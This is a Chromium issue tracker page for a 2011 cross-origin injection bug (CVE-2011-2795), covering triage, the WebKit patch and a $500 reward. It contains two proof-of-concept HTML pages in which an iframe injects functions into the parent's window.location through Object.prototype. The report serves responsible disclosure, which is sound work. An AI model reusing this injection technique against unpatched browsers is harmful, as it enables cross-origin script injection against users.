Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
User never visited
Closed: Jun 2011
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 0
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
XSS injection via prototype chain
Reported by shih.wei...@gmail.com, Jun 24 2011 Back to list
Chrome Version       : 12.0.742.100
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 5:
Firefox 4.x:
IE 7/8/9:

cross-domain iframe able to inject arbitrary function in window.location prototype,
and call by main page.


What steps will reproduce the problem?
1. Make a page in http://a.com/index01.html


<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script type="text/javascript">

function onLoad() {
	console.log("'fun' in location: ", "fun" in window.location);
	console.log("'fun' in document: ", "fun" in document);
	if ("fun" in window.location)
		console.log(window.location.fun());
}

</script>
</head>
<body onLoad="onLoad();">
    <iframe width="100" height="100"
    	src="http://b.com/index02.html">
    </iframe>
</body>
</html>



2. Make another page in http://b.com/index02.html
Which inject 


<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">

// Make sure touch top window location first, get the hook to inject function.
window.top.location;

//*/ Inject cross domain function via Object.prototype
Object.prototype.fun = function() {
	return("from iframe : " + window.location);
};
//*/

/*/ Inject cross domain function via location.__proto__
window.location.__proto__.fun = function() {
	return("from iframe : " + window.location);
};
//*/
</script>
</head>
<body></body>
</html>


3. Browse http://a.com/index01.html

What is the expected result?

Console log
'fun' in location:  true
index01.html:10'fun' in document:  false
index01.html:12from iframe : http://b.com/index02.html



What happens instead?

Console log
'fun' in location:  false
index01.html:10'fun' in document:  false


Please provide any additional information below. Attach a screenshot if
possible.

 
Sorry paste wrong result

expected result should be:

Console log
'fun' in location:  false
index01.html:10'fun' in document:  false


What happens instead should be:

Console log
'fun' in location:  true
index01.html:10'fun' in document:  false
index01.html:12from iframe : http://b.com/index02.html
Labels: -Type-Bug Type-Security
Comment 3 by jsc...@chromium.org, Jun 24 2011
Labels: -Pri-2 Pri-0 Restrict-View-SecurityTeam
Putting up the flags (verification and triage still needed).
Cc: ager@chromium.org
Labels: SecSeverity-Medium reward-topanel
Owner: abarth@chromium.org
Status: Available
(Adam, any interest?)

Online repro: https://cevans-secure.appspot.com/static/framefunc.html
(Modified to use alert() if there is a problem, silent if not).
Fires on Chrome trunk, 13 beta.
We tested Safari, and it didn't fire so it could be a V8-bindings specific issue.

@shih.weilung: Can this be used to:
- _override_ existing functions in the parent frame?
- Inject a function the other way around? e.g. the parent frame injects into the child frame?
If so, the severity could be higher but I'm going with Medium for now.
Comment 5 by jsc...@chromium.org, Jun 24 2011
Cc: japhet@chromium.org
Comment 6 by abarth@chromium.org, Jun 25 2011
Labels: -Area-Undefined Area-WebKit
Sigh.  JavaScriptCore used to have the same bug.  I though we'd fixed all of these.
Status: Assigned
Comment 8 by abarth@chromium.org, Jun 26 2011
Status: Started
https://bugs.webkit.org/show_bug.cgi?id=63411

I'm working up a patch for this issue.  Details in the WebKit bug.

@shih.weilung: If you create an account on bugs.webkit.org, I'll CC you on the WebKit bug (which is where the patch and any associated discussion will take place).
Comment 9 by abarth@chromium.org, Jun 26 2011
Patch posted upstream for review.
Thanks, I created an account with same email address on the WebKit bug.
Done.
Status: WillMerge
Thanks Adam!

Committed r89782: <http://trac.webkit.org/changeset/89782>
Labels: Mstone-13 ReleaseBlock-Stable
Status: FixUnreleased
Merged to M13: http://trac.webkit.org/changeset/89892
Comment 14 by mal@google.com, Jun 28 2011
Apologies for the spam, but this is an update to test changes to security@chromium.org.  Unfortunately, the test requires that I send email :(
@shih.weilung: how would you like to be credited in our release notes?
Thanks!
Please take a look at  issue 76748 , looks like same root cause.
http://code.google.com/p/chromium/issues/detail?id=76748

Should we use the name "Shih Weilung", written just like that?
Yes, "Shih Weilung".
Labels: -Restrict-View-SecurityTeam -reward-topanel Restrict-View-SecurityNotify reward-500 reward-unpaid
@shih.weilung: congrats! Although "medium" severity, this bug is sufficiently interesting to attract a $500 Chromium Security Reward. Good find!

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Sigh, already disclosed publicly.
Do you have a link for the public disclosure so that we can take a look?
Labels: CVE-2011-2795
@shih.weilung: we would still like to offer you the reward, despite the misunderstanding. To get any future rewards, all we ask is a chance to push the bugfix to stable users before it is publicly disclosed.

Thanks again for finding an interesting bug!
Thanks!
I'll keep that in mind.
@scarybeasts

One more thing, my name in passport is "Shih, Wei-Long".
Sorry for any inconvenience.
Labels: SecImpacts-Stable
Batch update.
@shih.weilung: please e-mail cevans@chromium.org to collect the reward.
Labels: -reward-unpaid
Payment in system.
Lifting view restrictions.
Labels: -Restrict-View-SecurityNotify
Lifting view restrictions.
Status: Fixed
Project Member Comment 33 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 34 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-Medium -Mstone-13 -SecImpacts-Stable Cr-Content Security-Impact-Stable Security-Severity-Medium M-13 Type-Bug-Security
Project Member Comment 35 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 36 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 37 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member Comment 38 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 39 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 40 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment